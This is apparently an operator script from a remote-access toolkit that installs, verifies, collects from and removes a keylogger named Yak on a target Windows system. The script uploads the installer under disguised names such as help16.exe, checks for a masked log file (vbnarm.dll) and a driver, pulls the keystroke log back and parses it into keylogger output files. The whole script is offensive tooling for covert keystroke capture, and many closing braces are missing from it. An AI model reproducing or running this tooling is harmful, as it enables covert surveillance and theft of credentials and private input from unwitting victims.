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# File: Yak.eps
# --add reset to zero option
# Script to install/uninstall/collect Yak
@include "_FileExists.epm";
@include "_GenericFunctions.epm";
@include "_RecordToolUse.epm";
@echo off;
@case-sensitive off;
string $tool = "Yak";
string $version = "2";
bool $usage_DEPLOYED = false;
bool $usage_EXERCISED = false;
bool $usage_DELETED = false;
string $status="Successful";
bool $temp;
# Get path that EP scripts are run out of
string $ScriptsDir;
string $resdir;
int $menuOption;
string $localPath = "$resdir\\Ops\\Uploads\\i386\\winnt\\Yak2";
string $yakUploadFile = "yak_min_install.exe";
string $localInstallPath = "$localPath\\$yakUploadFile";
string $localParsePath = "$resdir\\Ops\\Tools\\i386-winnt\\yak2\\yak.exe";
string $fileName = "help16.exe";
# Get system path
string $systemPath;
ifnot (_GetSystemPath($systemPath)) {
return false;
# Check to see if help16.exe exists on the target (shouldn't)
if (_FileExists ($fileName, "$systemPath")) {
$fileName = "winhlp16.exe";
echo "";
if($argc > 1){
if($argv[1] == "INSTALL"){
$temp = YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is");
if($temp) { _RecordToolUse($tool,$version,"DEPLOYED","Successful"); }
else { _RecordToolUse($tool,$version,"DEPLOYED","Unsuccessful"); }
return $temp;
else if ($argv[1] == "UNINSTALL"){
$temp = YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u");
if($temp) { _RecordToolUse($tool,$version,"DELETED","Successful"); }
else { _RecordToolUse($tool,$version,"DELETED","Unsuccessful"); }
return $temp;
else if ($argv[1] == "VERIFY"){
$temp = YakVerify($systemPath);
if($temp) { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unsuccessful"); }
return $temp;
else if ($argv[1] == "CLEAR"){
$temp = YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-r");
if($temp) { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unsuccessful"); }
return $temp;
else if ($argv[1] == "COLLECT"){
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
return false;
return true;
ifnot( $argv[1] == "?"){
echo "$argv[1] is not a valid argument";
return false;
while (true) {
echo "- $tool $version";
# print the command list
echo "";
echo " (0). Exit";
echo " (1). Install";
echo " (2). Uninstall";
echo " (3). Verify Install";
echo " (4). Collect and Parse";
echo " (5). Clear Capture File";
echo "";
$menuOption = GetInput("Enter the desired option");
if ($menuOption == 0) {
# Quit
return true;
} else if ($menuOption == 1) {
if(YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-is")) {
echo "success";
else { echo "failure"; _RecordToolUse($tool,$version,"DEPLOYED","Unuccessful"); }
} else if ($menuOption == 2) {
if(YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-u")) { _RecordToolUse($tool,$version,"DELETED","Successful"); }
else { _RecordToolUse($tool,$version,"DELETED","Unsuccessful"); }
} else if ($menuOption == 3) {
if(YakVerify($systemPath)) { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unsuccessful"); }
} else if ($menuOption == 4) {
ifnot(YakCollect($systemPath, $localParsePath)){
echo "Collection and parsing could not be completed, please finish manually";
else { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
} else if ($menuOption == 5){
if(YakInstall($localInstallPath, $YakUploadFile, $systemPath, $fileName, "-r")) { _RecordToolUse($tool,$version,"EXERCISED","Successful"); }
else { _RecordToolUse($tool,$version,"EXERCISED","Unuccessful"); }
} else {
# Invalid menuOption
echo "*** Invalid menuOption ***";
return false;
Sub YakUsage()
echo "Usage: yak [arg]";
echo " Runs Yak Script to perform Yak install, uninstall, verification, or collect";
echo "";
echo "Arguments:";
echo " [arg]";
echo " (optional) performs a specific Yak task and returns. ";
echo "";
return true;
Sub YakInstall(IN string $localInstallPath, IN string $YakUploadFile, IN string $systemPath, IN string $fileName, IN string $command)
bool $success = true;
# Install Yak - upload and run with -is option
echo "Uploading $YakUploadFile to $systemPath\\$fileName";
ifnot(`put $localInstallPath -name "$systemPath\\$fileName"`){
echo "Could not put $fileName into $systemPath";
$success = false;
echo "";
echo "Running $fileName on target...\n";
@echo on;
ifnot(`run -command "$systemPath\\$fileName $command" -redirect`)
@echo off;
echo "Could not run $systemPath\\$fileName $command";
$success = false;
@echo off;
echo "";
echo "Deleting $systemPath\\$fileName";
ifnot(`del $fileName -path $systemPath`){
echo "Could not delete $systemPath\\$fileName";
echo "Please delete it manually";
return $success;
Sub YakVerify(IN string $systemPath)
# Check to see if yak files exist
bool $logSuccessFlag = true;
bool $driverSuccessFlag = true;
bool $success = true;
if (_FileExists ("vbnarm.dll", "$systemPath")) {
echo "vbnarm.dll log file exists ... SUCCESSFUL";
} else {
echo "vbnarm.dll log file missing ... FAILED";
$logSuccessFlag = false;
echo ""; }
if (_FileExists ("fsprtx.sys", "$systemPath\\drivers")) {
echo "fsprtx.sys driver exists ... SUCCESSFUL";
} else {
echo "fsprtx.sys driver missing ... FAILED";
$driverSuccessFlag = false;
echo "";
if (($logSuccessFlag == true) && ($driverSuccessFlag == true)) {
echo "YAK properlly installed on target";
} else if ((($logSuccessFlag == true) && ($driverSuccessFlag == false)) ||
(($logSuccessFlag == false) && ($driverSuccessFlag == true))) {
echo "YAK is in a bad state...need a reboot before it's functional";
$success = false;
} else {
echo "YAK doesn't exist on target!";
$success = false;
return $success;
Sub YakCollect(IN string $systemPath, IN string $localParsePath)
bool $success = true;
# Download Yak and Parse the local file
echo "Getting $systemPath\\vbnarm.dll...";
echo "";
@record on;
ifnot(`copyget "$systemPath\\vbnarm.dll"`){
echo "Could not copyget $systemPath\\vbnarm.dll";
@record off;
return false;
@record off;
string $localName = GetCmdData("LocalName");
string $temp = split("_", $localName);
int $counter = 1;
string $fileDate = "";
while ($counter < sizeOf($temp)) {
$fileDate = "$fileDate\_$temp[$counter]";
echo "";
echo "Moving file to NOSEND directory...";
`local mkdir Get_Files\\NOSEND`;
ifnot(`local move Get_Files\\$localName Get_Files\\NOSEND\\$localName`){
echo "Could not move Get_Files\\$localName into Get_Files\\NOSEND\\$localName";
return false;
echo "";
echo "Parsing file...";
ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_UNICODE_$fileDate.txt"`){
echo "Could not run $localParsePath -tu -i";
$success = false;
ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_scancodes_UNICODE_$fileDate.txt"`){
echo "Could not run $localParsePath -tau -i";
$success = false;
ifnot(`local run -command "$localParsePath -t -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_ASCII_$fileDate.txt"`){
echo "Could not run $localParsePath -t -i";
$success = false;
ifnot(`local run -command "$localParsePath -ta -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_scancodes_ASCII_$fileDate.txt"`){
echo "Could not run $localParsePath -ta -i";
$success = false;
echo "";
if (prompt "Would you like to parse the file forcing English as a scancode option (Useful for boxes where multiple languages are used)?" ) {
echo "";
echo "Parsing file w/ English...";
ifnot(`local run -command "$localParsePath -tu -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_UNICODE_EN_$fileDate.txt -l -enus"`){
echo "Could not run $localParsePath -tu -i -l -enus";
$success = false;
ifnot(`local run -command "$localParsePath -tau -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_scancodes_UNICODE_EN_$fileDate.txt -l -enus"`){
echo "Could not run $localParsePath -tau -i -l -enus";
$success = false;
ifnot(`local run -command "$localParsePath -t -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_ASCII_EN_$fileDate.txt"`){
echo "Could not run $localParsePath -t -i";
$success = false;
ifnot(`local run -command "$localParsePath -ta -i Get_Files\\NOSEND\\$localName -o Get_Files\\keylogger_scancodes_ASCII_EN_$fileDate.txt"`){
echo "Could not run $localParsePath -ta -i";
$success = false;
echo "";
sleep 3000;
@echo on;
`local dir *$fileDate* -path "Get_Files\\NOSEND"`;
@echo off;
return $success;